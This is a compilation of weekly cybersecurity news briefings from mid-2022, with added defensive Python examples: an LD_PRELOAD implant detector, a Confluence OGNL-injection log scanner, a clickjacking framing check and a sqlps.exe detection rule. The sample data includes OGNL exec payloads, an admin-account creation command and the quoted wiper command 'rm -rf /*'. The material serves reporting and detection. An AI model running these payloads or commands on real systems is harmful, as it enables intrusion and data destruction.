Security researchers at Proofpoint have described a feature of Office 365 that could allow ransomware operators to encrypt files stored in SharePoint Online and OneDrive, making them unrecoverable without backups or the attacker's decryption key. The researchers focused on these two cloud applications because they are the most widely used in enterprise environments. The only requirement for both SharePoint Online and OneDrive is initial access, which can be achieved by compromising the user's account (through phishing, brute force, etc.), by tricking the user into authorising a third-party OAuth application with access to these platforms, or through session hijacking, either of a logged-in user's web session or of an API token for SharePoint and/or OneDrive. Once inside, the attack abuses the "AutoSave" functionality, which keeps cloud copies of previous versions each time a file is edited. The attacker reduces the limit on the number of file versions that can be stored to a very small number and then encrypts each file more times than that limit. The versions saved before the attack are thereby discarded and only the encrypted versions remain in the cloud account. Proofpoint reportedly alerted Microsoft, which indicated that the functionality works as intended and that old versions of files can be recovered for 14 days with the help of Microsoft Support.
June 17, 2022
Cyber Security
Cyber Security Weekly Briefing, 6 – 10 June
LockBit threatens Mandiant after linking them to Evil Corp The LockBit 2.0 ransomware group announced on its dark web publishing page afternoon, 6 May, the alleged compromise of cybersecurity firm Mandiant and its intention to publish a total of 356,841 files allegedly stolen from the firm. The publication included a file called "mandiantyellowpress.com.7z", which would be related to the domain registered that same day, mandiantyellowpress[.]com, which redirected at the time to ninjaflex[.]com. The LockBit threats followed Mandiant's publication of an article indicating that the Russian-based group Evil Corp had begun using LockBit ransomware in its targets to evade US sanctions. Since the threat became known, Mandiant has always said that they had no evidence of any kind of intrusion, but indicated that they were monitoring the situation. According to Bleeping Computer, which has been able to analyse the data, it is now confirmed that there has been no compromise. What LockBit has published is a message in which they deny the accusations made by what they call "tabloids" (referring to Mandiant) about a possible relationship between LockBit and Evil Corp. The group points out that the scripts and tools for attacks are publicly available and can be used by any user, so a similarity between the tools used by two groups does not mean that they can be linked to a single identity. They also include a final line in their message disassociating themselves from any kind of political ideology or special service of any country. More info: https://www.bleepingcomputer.com/news/security/mandiant-no-evidence-we-were-hacked-by-lockbit-ransomware/ Symbiote: stealthy new malware targeting Linux systems Researchers at BlackBerry and Intezer released information yesterday about a Linux malware they have named Symbiote. 
The malware, originally detected in attacks on the financial sector in Latin America in November 2021, is notable for its highly advanced capabilities in stealth and process hiding. Symbiote achieves this, in part, by not consisting of an executable itself, but rather a shared object library that is loaded into all running processes via the LD_PRELOAD directive, providing the attacker with rootkit functions, password-stealing capabilities and remote access. Loading itself into numerous processes, the malware can manipulate the responses of various tools and system functions, allowing users and researchers to see only a biased version of the results they are looking for. Among other things, it uses the Berkeley Packet Filter function, observed in backdoors developed by the Equation Group (NSA), to hide malicious traffic and determine which packets are visible when an administrator tries to capture traffic. More info: https://www.intezer.com/blog/research/new-linux-threat-symbiote/ Attacks on telecommunications companies and network service providers The US agencies NSA, CISA and FBI issued a joint security advisory warning about the detection of attacks perpetrated by malicious actors against telecommunications companies and network service providers globally. According to them, this campaign is carried out by exploiting existing vulnerabilities, mainly in network devices, pointing to a total of 16 security flaws in different brands. The advisory also highlights that, by gaining an initial foothold in a telecommunications organisation or network service provider, these malicious actors can identify critical users and systems responsible for maintaining the security of a country's critical infrastructure. 
Regarding attribution, no specific actor has been identified as carrying out these intrusions; the purpose of the alert is to urge all organisations to patch the listed vulnerabilities and apply the mitigation measures provided in order to prevent potential security incidents.

More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-158a

Long-running espionage campaign by actor Aoqin Dragon

SentinelLabs researchers have published research reporting the discovery of a state-linked APT called Aoqin Dragon, which allegedly ran espionage campaigns undetected for 10 years. The actor is said to have been active against governmental organisations, educational organisations and telecommunications companies, all located in Southeast Asia. According to the analysts, Aoqin Dragon has used three main infection mechanisms: between 2012 and 2015, malspam campaigns with Office document attachments exploiting CVE-2012-0158 and CVE-2010-3333; between 2016 and 2017, malicious executables disguised with fake antivirus icons; and since 2018, a shortcut file on removable drives that, when executed, injects malicious code. Aoqin Dragon is also notable for using two backdoors, Heyoka and Mongall, to exfiltrate information and communicate with its victims' networks.

More info: https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Updates, PoCs and active exploitation of 0-day vulnerability at Atlassian

After Atlassian issued a security alert last week concerning the 0-day vulnerability CVE-2022-26134 in its Confluence Server and Data Center products, the company released an update on Friday afternoon to fix the flaw as exploitation attempts proliferated.
Atlassian has urged customers to upgrade to versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 as soon as possible, and has also released temporary mitigation measures for those unable to upgrade immediately. Several easy-to-implement exploits showing how to abuse the vulnerability to create new administrator accounts, force DNS requests, collect information and spawn reverse shells were made public on Friday, and numerous exploitation attempts have since been detected, as reported by researchers at GreyNoise.

More info: https://www.bleepingcomputer.com/news/security/exploit-released-for-atlassian-confluence-rce-bug-patch-now/
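As an added example for the Symbiote item in this briefing (this is not code from the original page or from the BlackBerry/Intezer research): a small host check that looks for the two things an LD_PRELOAD-injected shared object leaves behind, a preload entry (in /etc/ld.so.preload or in a process environment) and one library that is mapped into every process while living outside the system library directories. The /proc data and the implant path /dev/shm/.x/libnss_x.so are constructed samples, and the trusted-directory list is an assumption to adjust per distribution.

```python
"""Look for LD_PRELOAD-style library injection in /proc-derived data.

Added example, not part of the original briefing or the Symbiote research.
The sample data below is constructed; the implant path is hypothetical.
"""
import re

# Assumption: a library outside these prefixes that is present in *every*
# process is worth a look. Adjust for the distribution being checked.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# One /proc/<pid>/maps line: range perms offset dev inode path
MAPS_RE = re.compile(r"^\S+\s+\S+\s+\S+\s+\S+\s+\d+\s+(/\S+\.so(?:\.\d+)*)\s*$")


def mapped_libs(maps_text):
    """Shared-object paths referenced by a /proc/<pid>/maps dump."""
    libs = set()
    for line in maps_text.splitlines():
        m = MAPS_RE.match(line)
        if m:
            libs.add(m.group(1))
    return libs


def preload_from_environ(environ_bytes):
    """LD_PRELOAD value from a /proc/<pid>/environ blob (NUL-separated), or None."""
    for entry in environ_bytes.split(b"\0"):
        if entry.startswith(b"LD_PRELOAD="):
            return entry.split(b"=", 1)[1].decode(errors="replace")
    return None


def find_indicators(ld_so_preload_text, process_maps, process_environs):
    """Return (kind, detail) findings.

    process_maps maps pid -> contents of /proc/<pid>/maps;
    process_environs maps pid -> raw bytes of /proc/<pid>/environ.
    """
    findings = []
    for line in ld_so_preload_text.splitlines():
        path = line.strip()
        if path and not path.startswith("#"):
            findings.append(("ld.so.preload entry", path))
    for pid, env in process_environs.items():
        value = preload_from_environ(env)
        if value:
            findings.append(("LD_PRELOAD in environment", f"pid {pid}: {value}"))
    per_pid = [mapped_libs(text) for text in process_maps.values()]
    if per_pid:
        for lib in sorted(set.intersection(*per_pid)):
            if not lib.startswith(TRUSTED_LIB_DIRS):
                findings.append(("untrusted library in every process", lib))
    return findings


LIBC = "/usr/lib/x86_64-linux-gnu/libc.so.6"
LDSO = "/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2"
IMPLANT = "/dev/shm/.x/libnss_x.so"  # hypothetical implant path (constructed sample)


def _maps(libs):
    """Constructed /proc/<pid>/maps text; addresses and inodes are placeholders."""
    lines = [f"7f{i:02x}00000000-7f{i:02x}00100000 r-xp 00000000 08:01 {1000 + i} {lib}"
             for i, lib in enumerate(libs)]
    lines.append("7ffd10000000-7ffd10021000 rw-p 00000000 00:00 0 [stack]")
    return "\n".join(lines)


INFECTED_MAPS = {
    1: _maps([LDSO, LIBC, IMPLANT]),
    412: _maps([LDSO, LIBC, "/usr/lib/x86_64-linux-gnu/libm.so.6", IMPLANT]),
    987: _maps([LDSO, LIBC, IMPLANT, "/opt/app/libplugin.so"]),
}
INFECTED_ENVIRONS = {
    1: b"PATH=/usr/sbin:/usr/bin\0HOME=/root\0",
    987: b"LD_PRELOAD=" + IMPLANT.encode() + b"\0SHELL=/bin/sh\0",
}
INFECTED_LD_SO_PRELOAD = "# constructed sample\n" + IMPLANT + "\n"
CLEAN_MAPS = {pid: _maps([LDSO, LIBC]) for pid in (1, 55)}


def scan_infected_sample():
    return find_indicators(INFECTED_LD_SO_PRELOAD, INFECTED_MAPS, INFECTED_ENVIRONS)


def scan_clean_sample():
    return find_indicators("", CLEAN_MAPS, {1: b"PATH=/usr/bin\0"})


if __name__ == "__main__":
    for kind, detail in scan_infected_sample():
        print(f"{kind}: {detail}")
```

On a live host the inputs come from /etc/ld.so.preload and from /proc/[0-9]*/maps and /proc/[0-9]*/environ (root is needed to read other users' environ). The caveat matters here: this script itself goes through libc, so a preloaded library that hooks the file and directory functions can hide its own entries from it. Run the check from a statically linked binary, or against a disk image or memory capture taken out of band.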
June 10, 2022
Cyber Security
Cyber Security Weekly Briefing, 28 May – 3 June
Rapid evolution of the EnemyBot botnet

Since its discovery last March by Securonix researchers, the botnet known as EnemyBot, focused on DDoS attacks, has continued to expand, in particular by adding exploits for recent critical vulnerabilities in web servers, content management systems, IoT devices and Android devices. Back in April, samples analysed by Fortinet already integrated exploits for more than a dozen vulnerabilities, with builds for several processor architectures. Now, a new report from AT&T Alien Labs describes a new variant in which exploits for 24 vulnerabilities have been added, most of them critical and some without a CVE assigned. Among the flaws, the addition of exploits for recent high-profile vulnerabilities stands out, such as those in VMware Workspace ONE Access (CVE-2022-22954), Spring Cloud Gateway (CVE-2022-22947) and F5 BIG-IP (CVE-2022-1388). The threat has been attributed to the Keksec group, which has specialised in building botnets since 2016. In addition, the malware source code has been published in a GitHub repository, making it accessible to other threat actors. Its publication has confirmed that the threat is built from the code of several earlier botnets (Mirai, Qbot and Zbot), which makes it more capable and adaptable. The rapid evolution of EnemyBot makes it necessary to watch closely the progress of this group's other projects, such as Tsunami, Gafgyt, DarkHTTP, DarkIRC and Necro.

More info: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

Mozilla fixes vulnerabilities in its products

Mozilla has released a new security update fixing several vulnerabilities affecting its Thunderbird email client and its Firefox and Firefox ESR browsers. None of the fixed bugs is rated critical, but several are rated high.
It should be noted that exploitation of these flaws by a remote attacker could lead to remote code execution, bypass of security restrictions, disclosure of sensitive information, spoofing, denial of service and data manipulation. Mozilla recommends upgrading to Firefox 101, Firefox ESR 91.10 and Thunderbird 91.10 to mitigate the vulnerabilities.

More info: https://www.mozilla.org/en-US/security/advisories/

Killnet threatens Italian entities again

Italy's CSIRT has issued an alert warning of a risk of imminent attacks against national public entities, private entities providing a public utility service and private entities identified with Italy. The warning follows a statement by the hacktivist group Killnet on its Telegram channel inciting massive and unprecedented attacks against the country. This is not the first time the group has shown interest in Italy, having already carried out denial-of-service attacks against it in May. Killnet announced on 24 May that it was launching operation Panopticon, calling on users to join the group and providing them with tools to carry out the attacks. The name of the operation, as the group has indicated, refers to a type of building designed so that the whole structure can be observed from a single point inside it. Bleeping Computer suggests that the name may hint that DDoS is not the real objective: defenders would concentrate on mitigating the DDoS attacks while Killnet pursues something else, possibly some kind of information theft. Finally, Italian media reported yesterday that several services, such as those of the Italian state police and the Ministries of Foreign Affairs and Defence, were interrupted, although the group has not so far claimed responsibility.
More info: https://www.bleepingcomputer.com/news/security/italy-warns-organizations-to-brace-for-incoming-ddos-attacks/

Actively exploited 0-day in Confluence

Atlassian has issued a security advisory warning of the active exploitation of a 0-day vulnerability in Confluence for which no patches are yet available. The vulnerability, tracked as CVE-2022-26134 and rated critical, allows unauthenticated remote code execution in Confluence Server and Confluence Data Center (pending confirmation that all versions are affected, but most likely so). Exploitation was detected by the Volexity team while investigating a security incident last weekend: after initial access through the 0-day, the attackers deployed an in-memory copy of BEHINDER, an open-source web shell framework that provides capabilities such as in-memory webshells and built-in support for interaction with Meterpreter and Cobalt Strike. Once BEHINDER was deployed, the attackers used the in-memory webshell to write two additional webshells to disk: CHINA CHOPPER and a custom file upload shell. Atlassian recommends that customers restrict Internet access to affected Confluence Server and Data Center instances, or shut the instances down. Atlassian also said that customers using Confluence hosted in Atlassian Cloud are not affected.

More info: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
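As an added example that serves both Confluence items (the 0-day description above and the fixed versions listed in the 4–10 June briefing), and not code from Atlassian or Volexity: a version check against the fixed releases, plus a scan of web-server access log lines for the OGNL expression injection that CVE-2022-26134 is exploited with in the request path. The log lines are constructed samples, and the marker list is a heuristic to tune rather than a complete signature.

```python
"""Confluence CVE-2022-26134: fixed-version check and access-log triage.

Added example, not Atlassian's or Volexity's code. The log lines below are
constructed; the marker list is a heuristic, not a complete signature.
"""
import re
from urllib.parse import unquote

# Fixed releases per branch, as listed by Atlassian: (major, minor) -> patch.
FIXED_VERSIONS = {
    (7, 4): 17, (7, 13): 7, (7, 14): 3, (7, 15): 2,
    (7, 16): 4, (7, 17): 4, (7, 18): 1,
}


def is_patched(version):
    """True only if the branch has a fix and this build is at or past it.

    Branches not listed (older or unsupported lines) are treated as unpatched,
    which is the conservative reading of the advisory.
    """
    parts = tuple(int(p) for p in version.strip().split("."))
    major, minor, patch = (parts + (0, 0, 0))[:3]
    fixed_patch = FIXED_VERSIONS.get((major, minor))
    return fixed_patch is not None and patch >= fixed_patch


# Combined log format: client ident user [time] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Fragments that appear in OGNL payloads placed in the URI path.
OGNL_MARKERS = ("${", "@java.", "@org.apache", "getRuntime", ".exec(",
                "javax.script", "Class.forName")


def decode_path(path, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are also caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def suspicious_requests(log_lines):
    """Return records for requests whose decoded path carries OGNL markers."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, raw_path, status = m.groups()
        path = decode_path(raw_path)
        markers = [k for k in OGNL_MARKERS if k in path]
        if markers:
            hits.append({"client": client, "method": method, "status": int(status),
                         "path": path, "markers": markers})
    return hits


# Constructed sample access-log lines (RFC 5737 test addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:12:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '198.51.100.9 - - [03/Jun/2022:10:12:05 +0000] "GET /login.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Jun/2022:10:13:44 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522whoami%2522%2529%257D/ HTTP/1.1" 302 0 "-" "python-requests/2.27"',
    '192.0.2.44 - - [03/Jun/2022:10:14:00 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 9901 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("7.18.0", "7.18.1", "7.13.8", "7.12.5"):
        print(v, "patched" if is_patched(v) else "UNPATCHED")
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["path"], hit["markers"])
```

The version check answers the first question an incident responder asks (was this instance exploitable on the day), and the log scan answers the second (was it probed). Confluence responds to the injected path with a redirect, so a 302 on a path containing `${` is not a sign the attempt failed; the decoded path and the command inside it are what to act on.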
June 3, 2022
Cyber Security
Cyber Security Weekly Briefing, 21–27 May
Unpatched vulnerability in PayPal

Security researcher H4x0r-DZ has disclosed an unpatched vulnerability in PayPal's money transfer service that could allow attackers to trick victims into completing transactions that send their money to the attacker, by means of a clickjacking attack. This technique tricks a user into clicking on seemingly harmless elements of a web page for fraudulent purposes: downloading malware, redirecting them to malicious websites or revealing sensitive information. The researcher found that the paypal[.]com/agreements/approve endpoint, designed for billing agreements and which should only accept tokens of the type billingAgreementToken, actually accepted another type of token. This allows an attacker to embed the page in an iframe so that a victim logged into PayPal transfers funds to an attacker-controlled PayPal account simply by clicking a button. The researcher decided to publish the proof of concept after reporting the flaw to the company in October 2021 without receiving any compensation or fix from PayPal.

More info: https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc

Predator spyware distributed through 0-day exploitation

Researchers from Google's Threat Analysis Group (TAG) have revealed details of the use of new 0-days in Chrome and Android to distribute the spyware known as Predator, a commercial cyber-espionage tool developed by Cytrox. The researchers report three separate campaigns. The first, detected in August 2021, exploited a vulnerability in Chrome to redirect to SBrowser (CVE-2021-38000, CVSSv3 6.1). The second started in September 2021 and exploited several Chrome vulnerabilities to escape the browser sandbox (CVE-2021-37973, CVSSv3 9.8, and CVE-2021-37976, CVSSv3 6.5).
The third campaign dates from October 2021 and used 0-days in Chrome and Android (CVE-2021-38003, CVSSv3 8.8, and CVE-2021-1048, CVSSv3 7.8). Despite exploiting different 0-days, the campaigns shared the same structure: the attackers emailed Android users one-time links (valid only once and expiring after 24 hours) that mimicked URL-shortening services, and delivered the exploits from them. The aim of the campaigns was to install the Android malware called ALIEN, which then downloaded the Predator spyware. Regarding attribution, the researchers assess that the customers behind the campaigns are government-backed actors, pointing to at least those of Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain and Indonesia. Their conclusions are in line with research carried out by Citizen Lab in December 2021.

More info: https://blog.google/threat-analysis-group/protecting-android-users-from-0-day-attacks/

Distribution of Cobalt Strike via fake PoCs

Cyble security researchers have discovered that threat actors used fake proof-of-concept exploits for two recent Windows vulnerabilities to infect victims with Cobalt Strike. The attackers posted malicious PoCs on GitHub for the remote code execution vulnerabilities CVE-2022-24500 and CVE-2022-26809, both fixed by Microsoft last April. The two repositories belonged to the same GitHub user, "rkxxz", whose account and repositories have since been removed. The targets of this increasingly common practice tend to be people working in information security. According to Cyble's analysis, the malware used in this campaign is a .NET application that displays a fake message about the attempted exploitation of the vulnerability and then runs PowerShell commands to download the Cobalt Strike beacon.
More info: https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/

0-day vulnerability in Tails

Tails has issued a security advisory warning of a vulnerability in Tails 5.0 that affects users who use the Linux distribution to browse with Tor Browser. They recommend not using Tor Browser in Tails until 31 May, when version 5.1 will be released. The issue stems from the security advisory issued by Mozilla fixing two critical vulnerabilities affecting its Thunderbird email client and Firefox browser. These flaws, tracked as CVE-2022-1529 and CVE-2022-1802, are prototype pollution bugs in the JavaScript engine, which Tor Browser also uses. Tails states that, if exploited, they could allow an attacker to obtain confidential information such as passwords or private messages, although the encryption of Tor connections that protects user anonymity is not affected. Tails recommends restarting the system and notes that Mozilla has reported exploitation of these flaws in the wild.

More info: https://tails.boum.org/security/prototype_pollution/index.en.html
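As an added example for the PayPal clickjacking item in this briefing (not the researcher's proof of concept and not PayPal's code): a helper that parses a response's Content-Security-Policy frame-ancestors directive and X-Frame-Options header and decides whether a given third-party origin could frame the page, which is the property a clickjacking attack like the one described depends on. The header sets, origins and the hardened policy are constructed samples.

```python
"""Can this response be framed by another origin? (clickjacking exposure check)

Added example, not PayPal's code or the researcher's proof of concept.
Header sets and origins below are constructed samples.
"""


def _frame_ancestors(csp_value):
    """Sources of the frame-ancestors directive, lower-cased, or None if absent."""
    for directive in csp_value.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def _split_origin(origin):
    """'https://host:port/...' -> (scheme, host); scheme may be empty."""
    scheme, _, rest = origin.lower().rpartition("://")
    hostport = rest.split("/", 1)[0]
    return scheme, hostport.rsplit(":", 1)[0]


def _source_matches(source, origin):
    """Match one CSP host-source (optional scheme, optional *. wildcard) to an origin."""
    if source == "*":
        return True
    s_scheme, s_host = _split_origin(source)
    o_scheme, o_host = _split_origin(origin)
    if s_scheme and s_scheme != o_scheme:
        return False
    if s_host.startswith("*."):
        return o_host.endswith(s_host[1:])
    return s_host == o_host


def framing_allowed(headers, page_origin, framer_origin):
    """True if a browser would let framer_origin embed a page from page_origin.

    headers: response header name -> value (names matched case-insensitively).
    When both headers are present, frame-ancestors takes precedence, as it
    does in current browsers; X-Frame-Options is only the fallback.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    sources = _frame_ancestors(lowered.get("content-security-policy", ""))
    same = page_origin.lower() == framer_origin.lower()
    if sources is not None:
        for src in sources:
            if src == "'none'":
                return False
            if src == "'self'":
                if same:
                    return True
                continue
            if _source_matches(src, framer_origin):
                return True
        return False
    xfo = lowered.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return same
    return True  # no framing policy at all: any site can embed the page


PAGE = "https://pay.example.com"
ATTACKER = "https://evil.example.net"
PARTNER = "https://partner.example.com"

# Constructed header sets, not PayPal's actual responses.
UNPROTECTED = {"Content-Type": "text/html"}
LEGACY = {"X-Frame-Options": "SAMEORIGIN"}
HARDENED = {
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.example.com",
    "X-Frame-Options": "SAMEORIGIN",  # fallback for browsers without CSP support
}


def exposure_report():
    """(label, framable by ATTACKER, framable by PARTNER) for each sample."""
    return [(name, framing_allowed(h, PAGE, ATTACKER), framing_allowed(h, PAGE, PARTNER))
            for name, h in (("unprotected", UNPROTECTED), ("legacy", LEGACY), ("hardened", HARDENED))]


if __name__ == "__main__":
    for name, by_attacker, by_partner in exposure_report():
        print(f"{name:12} attacker={by_attacker} partner={by_partner}")
```

Framing protection on the response is the generic control that would have stopped the attack described, independently of the token-type validation the endpoint itself was missing. A state-changing page that the unprotected sample represents is exactly what an attacker overlays with an invisible iframe; the hardened sample shows how to still allow an allow-listed partner domain while blocking everyone else.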
May 27, 2022
Cyber Security
Cyber Security Weekly Briefing, 13–20 May
VMware fixes critical vulnerabilities in several of its products

VMware has issued a security advisory fixing a critical authentication bypass vulnerability affecting several of its products. Tracked as CVE-2022-22972 (CVSSv3 9.8), the flaw affects local domain users and would allow an attacker with network access to the user interface to gain administrator access without authenticating. VMware has also released patches for a second high-severity local privilege escalation vulnerability (CVE-2022-22973, CVSSv3 7.8) that could allow a threat actor to elevate privileges to root. Both bugs affect VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager. The publication of these flaws has also prompted CISA to issue an emergency directive to federal agencies this week, urging them to immediately upgrade or remove VMware products from their networks before next Monday, given the increased risk of attacks. For its part, VMware has provided patch download links and installation instructions on its knowledge base, as well as workarounds in case an immediate upgrade is not possible.

More info: https://www.vmware.com/security/advisories/VMSA-2022-0014.html

New campaign against SQL servers

Microsoft's Security Intelligence team has shared on its Twitter account a newly discovered campaign targeting SQL servers that makes use of the living-off-the-land binary sqlps.exe. Brute-force attacks are used for initial access to the SQL server. Once the server is compromised, the threat actor uses sqlps.exe, a utility shipped with SQL Server that launches PowerShell with the SQL Server cmdlets loaded, to achieve persistence by running reconnaissance commands and changing the start-up mode of the SQL service to LocalSystem.
The attackers also use sqlps.exe to take control of the server by creating a new account with administrator permissions, which then lets them inject payloads into the system.

URL: https://twitter.com/MsftSecIntel/status/1526680337216114693

Increased activity of XorDDoS malware

Microsoft researchers have published an analysis of the XorDDoS trojan targeting Linux systems, in which they report a rise in activity over the last six months. XorDDoS, active since at least 2014, owes its name to the XOR encryption used for communications with its command-and-control server and to its characteristic type of attack, distributed denial of service (DDoS). To that end, XorDDoS usually focuses on compromising Internet of Things (IoT) devices to build its DDoS botnet. Microsoft's analysis details that devices infected with XorDDoS are later compromised with the Tsunami backdoor, which in turn deploys the XMRig cryptominer. Among the TTPs employed by XorDDoS, brute force against exposed SSH services stands out as the main entry vector for obtaining root on the compromised machine. It also has modules designed to evade security tools by hiding its activity, which makes it harder to detect. Microsoft provides recommendations for defending against this threat.

More info: https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

CISA exposes commonly used entry vectors

CISA, together with authorities in Canada, New Zealand, the Netherlands, the United Kingdom and the United States, has issued a warning about weak security controls and practices that are commonly used for initial access when compromising victims.
They note that cybercriminals often exploit poor security configurations (misconfigured or unprotected systems), weak controls and other bad practices as part of their tactics to compromise systems. Some of the most commonly used Tactics, Techniques and Procedures (TTPs) are: exploiting a public-facing application [T1190], external remote services [T1133], phishing [T1566], exploiting a trusted relationship [T1199] and using valid accounts [T1078]. To counter these techniques, the advisory summarises a series of recommended practices: access control, credential hardening, centralised log management, antivirus and detection tools, operating exposed services with secure configurations, and keeping software up to date.

URL: https://www.cisa.gov/uscert/ncas/alerts/aa22-137a
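As an added example for the SQL Server campaign item in this briefing (not Microsoft's published detection logic): a small rule set run over constructed process-creation events that flags sqlps.exe launches carrying the behaviours described, reconnaissance commands, account creation, administrators group changes and service start-mode changes, and any sqlps.exe not launched by the SQL Server Agent. The event records, the command lines and the choice of SQLAGENT.EXE as the only expected parent are assumptions made for the sample.

```python
"""Flag suspicious sqlps.exe activity in process-creation events.

Added example, not Microsoft's published detection. Events below are
constructed (Sysmon-style fields); the expected-parent list is an assumption.
"""
import ntpath
import re

# (regex, label) pairs for the behaviours the campaign was reported to use.
BEHAVIOURS = [
    (r"\bwhoami\b|\bsysteminfo\b|\bipconfig\b", "reconnaissance command"),
    (r"\bnet\s+user\b.*\s/add\b|\bNew-LocalUser\b", "local account creation"),
    (r"\bnet\s+localgroup\s+administrators\b|\bAdd-LocalGroupMember\b",
     "administrators group change"),
    (r"\bsc(?:\.exe)?\s+config\b|\bSet-Service\b|\bLocalSystem\b",
     "service start-mode change"),
]

# Assumption: SQL Server Agent job steps are the only routine launcher of sqlps.exe.
EXPECTED_PARENTS = {"sqlagent.exe"}


def evaluate(event):
    """Return a list of finding labels for one process-creation event."""
    if ntpath.basename(event.get("Image", "")).lower() != "sqlps.exe":
        return []
    findings = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent not in EXPECTED_PARENTS:
        findings.append(f"sqlps.exe launched by unexpected parent {parent or 'unknown'}")
    command_line = event.get("CommandLine", "")
    for pattern, label in BEHAVIOURS:
        if re.search(pattern, command_line, re.IGNORECASE):
            findings.append(label)
    return findings


def triage(events):
    """(event index, findings) for every event that raised at least one finding."""
    result = []
    for index, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            result.append((index, findings))
    return result


SQLPS = r"C:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlps.exe"
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SQLAGENT = r"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE"

# Constructed sample events.
SAMPLE_EVENTS = [
    {   # recon plus admin account creation, spawned from the database engine
        "Image": SQLPS, "ParentImage": SQLSERVR,
        "CommandLine": 'sqlps.exe -c "whoami; net user svc_bkp P@ssw0rd /add; '
                       'net localgroup administrators svc_bkp /add"',
    },
    {   # routine Agent job step running a query
        "Image": SQLPS, "ParentImage": SQLAGENT,
        "CommandLine": r'"C:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlps.exe" '
                       r'-NoLogo -Command Invoke-Sqlcmd -Query "SELECT name FROM sys.databases"',
    },
    {   # service start-mode change used for persistence
        "Image": SQLPS, "ParentImage": SQLSERVR,
        "CommandLine": 'sqlps.exe -c "sc config MSSQLSERVER obj= LocalSystem start= auto"',
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile",
    },
]

if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"])
        for finding in findings:
            print("   -", finding)
```

The parent-process rule is the cheap signal: an engine process spawning sqlps.exe means a database session reached the operating system, which after a brute-forced login is the pivot the campaign relies on. The command-line rules then say what was done with it. Keep the parent allow-list tight and review it against the instance's own SQL Agent jobs before alerting on it in production.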
May 20, 2022
Cyber Security
Cyber Security Weekly Briefing, 7–13 May
Vulnerability in BIG-IP exploited to erase data

On 4 May, F5 fixed, among others, a vulnerability affecting BIG-IP devices (CVE-2022-1388, CVSSv3 9.8) that could allow an unauthenticated attacker with network access to the BIG-IP system, through the management port or self IP addresses, to execute arbitrary commands, delete or create files, or disable services. The severity of the flaw made patching urgent from the outset, and several security researchers warned that proofs of concept would likely be released quickly. Only a few days later, firms such as Horizon3 and Positive Technologies, along with individual researchers, confirmed they had developed working exploits. Since then, mass exploitation has been reported, mainly to drop webshells for initial access to networks, steal SSH keys and enumerate system information. Separately, researchers at the SANS Internet Storm Center have warned that their honeypots have recorded attacks executing the command rm -rf /* on BIG-IP devices. This command deletes every file, including the configuration files the device needs to operate, since the exploit gives the attacker root on the device's Linux operating system. Security researcher Kevin Beaumont has also confirmed this type of attack, noting the disappearance of multiple Shodan entries for such devices.

More info: https://www.bleepingcomputer.com/news/security/critical-f5-big-ip-vulnerability-exploited-to-wipe-devices/

* * *

Microsoft fixes three 0-day vulnerabilities

Microsoft has published its monthly security bulletin for May, fixing a total of 75 flaws. These include three 0-day vulnerabilities, one of them actively exploited, and eight critical vulnerabilities that could allow remote code execution or privilege escalation on the vulnerable system.
